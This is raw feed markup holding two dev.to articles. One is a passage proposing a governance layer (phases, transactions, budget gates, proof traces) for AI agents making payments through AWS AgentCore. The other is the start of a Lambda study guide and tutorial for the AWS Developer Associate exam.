&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Pseudocode: transactional agent workflow
&lt;/span&gt;&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;agent&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;commit&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;tx&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;tx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;pay_for_data&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.05&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;endpoint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;market-feed&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;tx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;analyze&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;tx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;send_report&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;user_email&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;# if analyze fails → pay_for_data compensation fires
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Databases solved this in 1978. Durable execution engines solved it for workflows. The agent tool-calling loop is the layer still missing it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Gap 3: Who decides the threshold for approval?
&lt;/h3&gt;

&lt;p&gt;A flat session limit doesn't distinguish between "50 calls at $0.01" and "1 call at $2.40." Both are under a $5 budget. One might need human approval.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The scenario:&lt;/strong&gt; An agent discovers a premium data source mid-execution. Single call: $2.40. Session limit is $10. Within bounds. But nobody approved spending $2.40 on a single API call for a task that was expected to cost $0.30 total.&lt;/p&gt;

&lt;p&gt;What's needed: &lt;strong&gt;graduated budget gates&lt;/strong&gt; that change agent behavior at thresholds, not just stop execution at a ceiling. At 50%, the agent reduces scope and picks cheaper sources. At 75%, new payment commits are blocked and the agent re-evaluates. Above 90%, full stop. Plus per-call approval rules: any single payment above $0.50 requires explicit authorization. The budget gate is behavioral, not binary.&lt;/p&gt;
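&lt;p&gt;One way to sketch a graduated gate in a few lines of Python. The tier names are made up for illustration; the thresholds are the ones described above:&lt;/p&gt;

```python
import bisect

# Behavioral tiers: normal below 50%, progressively tighter behavior,
# full stop above 90% (the thresholds described in the text).
THRESHOLDS = [0.50, 0.75, 0.90]
ACTIONS = ["proceed", "reduce_scope", "block_new_commits", "halt"]

def budget_action(spent, budget):
    """Map the spent fraction of the budget to a behavior, not just a stop."""
    frac = spent / budget
    return ACTIONS[bisect.bisect_right(THRESHOLDS, frac)]
```

&lt;p&gt;The gate returns a behavior the agent must adopt, rather than a boolean allow/deny.&lt;/p&gt;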

&lt;h3&gt;
  
  
  Gap 4: Why was this payment permitted?
&lt;/h3&gt;

&lt;p&gt;AgentCore provides observability: logs, metrics, traces showing what happened. But "what happened" isn't the same as "why was it allowed." When a payment goes wrong, you need the decision chain: which rules were evaluated, what phase the agent was in, whether approval was required.&lt;/p&gt;

&lt;p&gt;What's needed: &lt;strong&gt;proof traces&lt;/strong&gt;. A structured record for every payment decision.&lt;/p&gt;

&lt;p&gt;Here's what a &lt;em&gt;blocked&lt;/em&gt; payment looks like (this is where the value is visible):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Decision: DENIED
Tool: pay_for_data
✗ Phase is EXPLORE (payment tools require COMMIT)
  Agent must transition to DECIDE → COMMIT before paying
  Action: PhaseError raised, tool call rejected
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And a permitted one with conditions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Decision: ALLOWED (with approval)
Tool: pay_for_data
✓ Phase is COMMIT
✓ Transaction T1 is open
✓ Budget: 12% spent, below all thresholds
⚠ Cost $0.50 exceeds $0.25 threshold → approval required
✓ Approval granted by callback
Executed in 0.003s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When something goes wrong, you know whether the system allowed it or failed to prevent it. That's the difference between a bug and a governance gap.&lt;/p&gt;
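&lt;p&gt;Such a trace can be captured as a small structured record. This shape is illustrative, not an AgentCore schema:&lt;/p&gt;

```python
from dataclasses import dataclass, field

@dataclass
class DecisionRecord:
    """One proof-trace entry: the why behind a payment decision."""
    tool: str
    decision: str                               # "ALLOWED" or "DENIED"
    checks: list = field(default_factory=list)  # rule-by-rule results
    approval: str = "not required"

def deny_in_explore(tool):
    # the EXPLORE-phase rejection from the trace above, captured as data
    return DecisionRecord(
        tool=tool,
        decision="DENIED",
        checks=["phase is EXPLORE (payment tools require COMMIT)"],
    )
```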

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F88crxdemkw1yd9ymuckg.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F88crxdemkw1yd9ymuckg.gif" alt=" " width="505" height="220"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Why hasn't AWS built this?
&lt;/h2&gt;

&lt;p&gt;Fair question. Three possible reasons:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;It's coming in GA.&lt;/strong&gt; The preview focuses on payment execution. Governance features (approval workflows, phase enforcement) may ship later. AWS tends to launch primitives first, then layer policy on top.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;They expect frameworks to own it.&lt;/strong&gt; LangGraph, CrewAI, Strands Agents, and others are building orchestration. AWS may see governance as the framework's job, not the infrastructure's.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The market signal isn't there yet.&lt;/strong&gt; Few agents transact in production today. The governance pain hasn't been felt widely enough to drive demand.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;All three are plausible. But if you're building a paying agent today, you can't wait for option 1 or 2 to materialize. The gap exists now.&lt;/p&gt;

&lt;h2&gt;
  
  
  A governance pattern for paying agents
&lt;/h2&gt;

&lt;p&gt;The four pieces work together:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Phases&lt;/strong&gt; prevent premature payments (gap 1)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Transactions&lt;/strong&gt; protect multi-step workflows (gap 2)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Budget gates&lt;/strong&gt; enforce graduated spending policy (gap 3)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Proof traces&lt;/strong&gt; record why every payment was permitted or denied (gap 4)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The rules that govern these should be readable by the people responsible for spending policy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;BLOCK pay_for_data WHEN phase IS NOT commit
BLOCK * WHEN budget ABOVE 90%
REQUIRE APPROVAL FOR * WHEN cost ABOVE 0.50
FLAG * WHEN time OUTSIDE 09:00-17:00
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This isn't natural language. An engineer still needs to write it. But a product manager can read it and confirm it matches the policy they intended.&lt;/p&gt;
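&lt;p&gt;Parsing rules of this shape is deliberately trivial. A toy parser, assuming only the grammar of the four example rules above:&lt;/p&gt;

```python
import re

# ACTION TOOL WHEN CONDITION -- the shape of the example rules above
RULE_RE = re.compile(r"(BLOCK|FLAG|REQUIRE APPROVAL FOR)\s+(\S+)\s+WHEN\s+(.*)")

def parse_rule(line):
    """Parse one governance rule into a small dict."""
    m = RULE_RE.match(line.strip())
    if m is None:
        raise ValueError(f"unparseable rule: {line!r}")
    action, tool, condition = m.groups()
    return {"action": action, "tool": tool, "condition": condition}
```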

&lt;h2&gt;
  
  
  Reference implementation
&lt;/h2&gt;

&lt;p&gt;I built a single-file Python library that implements this pattern: phases, transactions, budget gates, proof traces, and the rule DSL above. Zero dependencies. MIT licensed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/vidanov/shape" rel="noopener noreferrer"&gt;Shape on GitHub&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It wraps any tool-calling agent (LangGraph, CrewAI, Strands, raw Python) with external governance. It's not a framework and it's not competing with AgentCore. It fills the gap between "the agent can pay" and "the agent should be allowed to pay right now." Whether you build that yourself, use Shape, or wait for AWS to ship it, the pattern is the same.&lt;/p&gt;

&lt;p&gt;AWS built the payment rails. The governance layer is still your problem.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Links:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://aws.amazon.com/blogs/machine-learning/agents-that-transact-introducing-amazon-bedrock-agentcore-payments-built-with-coinbase-and-stripe/" rel="noopener noreferrer"&gt;AWS announcement: Agents that transact&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/payments.html" rel="noopener noreferrer"&gt;AgentCore payments documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/vidanov/shape" rel="noopener noreferrer"&gt;Shape: governance for AI agents&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.x402.org/" rel="noopener noreferrer"&gt;x402 protocol&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>aws</category>
      <category>ai</category>
      <category>agentcore</category>
      <category>payments</category>
    </item>
    <item>
      <title>Develop Code for Lambda | 🏗️ Build A Real-Time Data Processing Pipeline</title>
      <dc:creator>Ntombizakhona Mabaso</dc:creator>
      <pubDate>Thu, 07 May 2026 20:34:21 +0000</pubDate>
      <link>https://dev.to/aws-builders/develop-code-for-lambda-build-a-real-time-data-processing-pipeline-iii</link>
      <guid>https://dev.to/aws-builders/develop-code-for-lambda-build-a-real-time-data-processing-pipeline-iii</guid>
      <description>&lt;p&gt;&lt;strong&gt;Exam Guide:&lt;/strong&gt; Developer - Associate&lt;br&gt;
&lt;strong&gt;🏗️ Domain 1:&lt;/strong&gt;  &lt;strong&gt;&lt;em&gt;Development with AWS Services&lt;/em&gt;&lt;/strong&gt;&lt;br&gt;
📘 &lt;strong&gt;Task 2:&lt;/strong&gt; &lt;em&gt;Develop Code for Lambda&lt;/em&gt;       &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lambda is the most heavily tested service on the DVA-C02. It is also among the most used and talked-about AWS services overall, just behind EC2 and S3. So you need to know how to configure it, write code for it, handle errors, tune performance, and integrate it with practically every other AWS service.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  📘Concepts
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Lambda Execution Model
&lt;/h3&gt;

&lt;p&gt;When you invoke a Lambda function, AWS:&lt;br&gt;
&lt;strong&gt;1.&lt;/strong&gt; Finds or creates an &lt;em&gt;execution environment&lt;/em&gt; (container)&lt;br&gt;
&lt;strong&gt;2.&lt;/strong&gt; Loads your code and initializes it (&lt;em&gt;cold start&lt;/em&gt;)&lt;br&gt;
&lt;strong&gt;3.&lt;/strong&gt; Runs your &lt;em&gt;handler function&lt;/em&gt;&lt;br&gt;
&lt;strong&gt;4.&lt;/strong&gt; Keeps the environment &lt;em&gt;warm&lt;/em&gt; for reuse (subsequent invocations skip step 2)&lt;/p&gt;

&lt;p&gt;Code outside the handler runs once during cold start and is reused. This is why you initialize SDK clients and database connections outside the handler.&lt;/p&gt;
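&lt;p&gt;A small demonstration of the warm-reuse effect. &lt;code&gt;create_client&lt;/code&gt; is a stand-in for something expensive like &lt;code&gt;boto3.client(...)&lt;/code&gt; or a database connection, so the once-per-environment behavior is visible:&lt;/p&gt;

```python
INIT_COUNT = {"n": 0}

def create_client():
    # stand-in for boto3.client("dynamodb"), a DB pool, config loading, etc.
    INIT_COUNT["n"] += 1
    return object()

# runs once per execution environment (during cold start), then is reused
client = create_client()

def handler(event, context):
    # every warm invocation reuses the module-level client
    return {"statusCode": 200, "client_id": id(client)}
```

&lt;p&gt;Invoke the handler any number of times in the same environment and the client is only created once.&lt;/p&gt;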
&lt;h3&gt;
  
  
  Key Configuration Parameters
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Range&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Notes&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Memory&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;128 MB – 10,240 MB&lt;/td&gt;
&lt;td&gt;128 MB&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CPU scales proportionally with memory&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Timeout&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1s – 900s (15 min)&lt;/td&gt;
&lt;td&gt;3s&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Max 15 minutes; use Step Functions or ECS for longer-running work&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Concurrency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reserved or Provisioned&lt;/td&gt;
&lt;td&gt;1000/region&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Reserved = guarantee + cap; Provisioned = pre-warmed&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Ephemeral storage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;512 MB – 10,240 MB&lt;/td&gt;
&lt;td&gt;512 MB&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;/tmp directory for temporary files&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Layers&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Up to 5&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;250 MB total unzipped (function + layers)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h3&gt;
  
  
  Invocation Types and Error Handling
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Invocation Type&lt;/th&gt;
&lt;th&gt;Source Examples&lt;/th&gt;
&lt;th&gt;Retry Behavior&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Error Destination&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Synchronous&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;API Gateway, ALB&lt;/td&gt;
&lt;td&gt;No automatic retries; the caller handles errors&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Caller gets the error&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Asynchronous&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;S3, SNS, EventBridge&lt;/td&gt;
&lt;td&gt;2 automatic retries (3 total)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;DLQ or Lambda Destinations&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Event source mapping&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SQS, Kinesis, DynamoDB Streams&lt;/td&gt;
&lt;td&gt;Retries until record expires or succeeds&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;DLQ (SQS) or on-failure destination&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h3&gt;
  
  
  Lambda Destinations vs DLQ
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Feature&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;DLQ&lt;/th&gt;
&lt;th&gt;Lambda Destinations&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Captures success&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Captures failure&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Context included&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Minimal&lt;/td&gt;
&lt;td&gt;Full (request, response, error)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Supported targets&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SQS, SNS&lt;/td&gt;
&lt;td&gt;SQS, SNS, Lambda, EventBridge&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Works with&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Async invocations&lt;/td&gt;
&lt;td&gt;Async invocations&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lambda Destinations are the modern approach and preferred over DLQs. DLQs are still valid for SQS event source mappings.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;
  
  
  VPC Access
&lt;/h3&gt;

&lt;p&gt;By default, Lambda runs in an AWS-managed VPC and can access the internet and public AWS services. When you attach Lambda to your own VPC:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Without VPC:  Lambda → Internet → AWS Services ✅  |  Lambda → Private RDS ❌
With VPC:     Lambda → Private RDS ✅  |  Lambda → Internet ❌ (needs NAT Gateway)
              Lambda → VPC Endpoint → AWS Services ✅
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Points:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; VPC Lambda needs &lt;em&gt;private subnets&lt;/em&gt; with a &lt;em&gt;NAT Gateway&lt;/em&gt; for internet access&lt;br&gt;
&lt;strong&gt;2.&lt;/strong&gt; Use &lt;em&gt;VPC endpoints&lt;/em&gt; to reach S3 and DynamoDB (gateway endpoints) or SQS (an interface endpoint via PrivateLink) without a NAT&lt;br&gt;
&lt;strong&gt;3.&lt;/strong&gt; Use &lt;em&gt;RDS Proxy&lt;/em&gt; for connection pooling because Lambda can overwhelm databases with concurrent connections&lt;/p&gt;
&lt;h3&gt;
  
  
  Cold Starts
&lt;/h3&gt;

&lt;p&gt;A cold start happens when Lambda creates a new execution environment. Strategies to reduce them:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; &lt;em&gt;Provisioned Concurrency:&lt;/em&gt; pre-warms environments (costs money when idle)&lt;br&gt;
&lt;strong&gt;2.&lt;/strong&gt; &lt;em&gt;Keep deployment packages small:&lt;/em&gt; smaller packages initialize faster&lt;br&gt;
&lt;strong&gt;3.&lt;/strong&gt; &lt;em&gt;Initialize outside the handler:&lt;/em&gt; SDK clients, DB connections, config&lt;br&gt;
&lt;strong&gt;4.&lt;/strong&gt; &lt;em&gt;Use ARM (Graviton2):&lt;/em&gt; often faster and about 20% cheaper&lt;/p&gt;
&lt;h3&gt;
  
  
  Kinesis And Lambda Key Settings
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Setting&lt;/th&gt;
&lt;th&gt;What It Does&lt;/th&gt;
&lt;th&gt;&lt;em&gt;Relevance&lt;/em&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Batch size&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Records per invocation (max 10,000)&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Larger batches = fewer invocations&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Batch window&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Wait time to fill batch (max 300s)&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Reduces invocations for low-traffic streams&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;Parallelization factor&lt;/strong&gt; (1–10)&lt;/td&gt;
&lt;td&gt;Concurrent batches per shard&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Increases throughput without adding shards&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Bisect batch on error&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Splits batch in half on failure&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Isolates the bad record&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Starting position&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;LATEST or TRIM_HORIZON&lt;/td&gt;
&lt;td&gt;&lt;em&gt;LATEST = new only. TRIM_HORIZON = from beginning&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
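&lt;p&gt;To see why bisect-on-error isolates a poison record, here is a toy simulation of the splitting logic. It illustrates the idea only; the real mechanism lives inside the Lambda event source mapping:&lt;/p&gt;

```python
def process(batch, handler):
    """Recursively bisect a failing batch until bad records are isolated."""
    try:
        handler(batch)
        return []                      # whole batch succeeded
    except Exception:
        if len(batch) == 1:
            return batch               # isolated the poison record
        mid = len(batch) // 2
        # retry each half independently, collecting the bad records
        return process(batch[:mid], handler) + process(batch[mid:], handler)
```

&lt;p&gt;Good records around the bad one get processed instead of the whole batch failing repeatedly.&lt;/p&gt;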


&lt;h2&gt;
  
  
  🏗️ Build A Real Time Data Processing Pipeline
&lt;/h2&gt;

&lt;p&gt;Now let's put these concepts into practice by building a &lt;strong&gt;Real-Time Data Processing Pipeline&lt;/strong&gt; using Lambda:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A Lambda function with VPC access connecting to an RDS database&lt;/li&gt;
&lt;li&gt;Lambda layers for shared dependencies&lt;/li&gt;
&lt;li&gt;A DLQ (Dead Letter Queue) and Lambda Destinations for error handling&lt;/li&gt;
&lt;li&gt;A Kinesis stream processor that transforms data in near real time&lt;/li&gt;
&lt;li&gt;Performance tuning with memory configuration&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;This covers all the skills for this task: Lambda configuration, VPC access, error handling, event lifecycle, integrations, and performance tuning.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;
  
  
  Prerequisites
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://ntombizakhona.medium.com/amazon-web-services-a8e57a9c6084" rel="noopener noreferrer"&gt;&lt;strong&gt;An AWS account&lt;/strong&gt;&lt;/a&gt; &lt;em&gt;(free tier covers most of this)&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;


&lt;h2&gt;
  
  
  Part I
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Create and Configure a Lambda Function
&lt;/h3&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Create the Function&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open the &lt;strong&gt;Lambda&lt;/strong&gt; console&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; Click &lt;strong&gt;Create function&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt; Choose &lt;strong&gt;Author from scratch&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Function name:&lt;/strong&gt; &lt;code&gt;DataProcessor&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime:&lt;/strong&gt; Python 3.12&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Create function&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully created the function "DataProcessor".&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Before writing code, let's walk through the configuration tabs.&lt;/em&gt; &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 04:&lt;/strong&gt; Click the &lt;strong&gt;Configuration&lt;/strong&gt; tab.&lt;br&gt;
&lt;strong&gt;General configuration&lt;/strong&gt;&lt;br&gt;
Click &lt;strong&gt;Edit&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Memory:&lt;/strong&gt; 256 MB &lt;em&gt;(default is 128 MB)&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ephemeral storage:&lt;/strong&gt; 512 MB &lt;em&gt;(default)&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Timeout:&lt;/strong&gt; 0 min 30 sec &lt;em&gt;(default is 3 seconds)&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lambda allocates CPU proportionally to memory. At 1,769 MB you get one full vCPU. Increasing memory from 128 MB to 256 MB doubles your CPU, so your function may run in roughly half the time and cost the same or less.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 05:&lt;/strong&gt; &lt;strong&gt;Environment variables&lt;/strong&gt;&lt;br&gt;
